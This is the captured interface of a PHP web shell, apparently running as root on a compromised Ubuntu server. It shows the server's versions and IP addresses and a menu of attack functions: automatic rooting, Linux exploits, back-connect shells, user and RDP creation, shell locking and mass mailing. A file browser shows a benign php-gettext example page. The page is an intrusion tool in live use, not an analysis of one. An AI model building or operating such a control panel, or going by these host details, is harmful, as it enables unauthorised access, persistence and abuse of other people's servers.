Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
php-php-gettext /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
locale
[ DIR ]
drwxr-xr-x
index.php
878
B
-rw-r--r--
pigs_dropin.php
2.5
KB
-rw-r--r--
pigs_fallback.php
2.47
KB
-rw-r--r--
update
326
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<html> <head> <title>PHP-gettext examples</title> </head> <body> <h1>PHP-gettext</h1> <h2>Introduction</h2> <p>PHP-gettext provides a simple gettext replacement that works independently from the system's gettext abilities. It can read MO files and use them for translating strings.</p> <p>This version has the ability to cache all strings and translations to speed up the string lookup. While the cache is enabled by default, it can be switched off with the second parameter in the constructor (e.g. when using very large MO files that you don't want to keep in memory)</p> <h2>Examples</h2> <ul> <li><a href="pigs_dropin.php">PHP-gettext as a dropin replacement</a></li> <li><a href="pigs_fallback.php">PHP-gettext as a fallback solution</a></li> </ul> <hr /> <p>Copyright (c) 2003-2006 Danilo Segan</p> <p>Copyright (c) 2005-2006 Steven Armstrong</p> </body> </html>
Close